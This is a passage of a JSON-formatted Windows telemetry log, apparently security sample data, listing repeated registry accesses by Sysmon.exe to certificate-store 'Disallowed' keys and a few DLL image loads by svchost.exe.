"event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879180000, 
- "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "winhttp.dll", - "image_path": "C:\\Windows\\System32\\winhttp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "policymanager.dll", - "image_path": "C:\\Windows\\System32\\policymanager.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 
131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": 
"CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879330000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp110_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570877930000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570879330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 